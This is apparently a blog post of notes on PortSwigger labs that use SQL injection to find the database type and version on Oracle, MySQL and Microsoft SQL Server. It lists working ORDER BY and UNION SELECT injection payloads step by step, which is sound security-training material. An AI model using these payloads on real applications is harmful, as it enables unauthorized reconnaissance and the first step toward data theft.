3. SQL Injection - Examining the Database - Versions
Examining the type of database and its details like version, how many tables and what the table holds is useful.
Cheat Sheet SQL Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
Do SQL Injection to retrieve the database version.
(ORACLE)
| Lab-07 - SQL injection attack, querying the database type and version on Oracle | 
| (1) Determine the number of columns | 
| ' order by 3 -- -> internal server error | 
| 3 - 1 = 2 | 
| (2) Determine the data types of the columns | 
| ' UNION SELECT 'a', 'a' from DUAL-- -> Oracle database | 
| (3) Output the version of the database | 
| ' UNION SELECT banner, NULL from v$version-- | 
| SELECT banner FROM v$version | 
(Microsoft/MySQL)
Using BURP Intruder and Repeater
| Lab 08 - SQL injection attack, querying the database type and version on MySQL and Microsoft | 
| SQL Injection - Product Category | 
| End Goal - display the database version | 
| Analysis: | 
| (1) Find number of columns | 
| ' order by 3# -> internal server error | 
| 3 - 1 = 2 | 
| (2) Figure out which columns contain text | 
| ' UNION SELECT 'a', 'a'# | 
| (3) Output the version | 
| ' UNION SELECT @@version, NULL# | 
| SELECT @@version | 
Comments
Post a Comment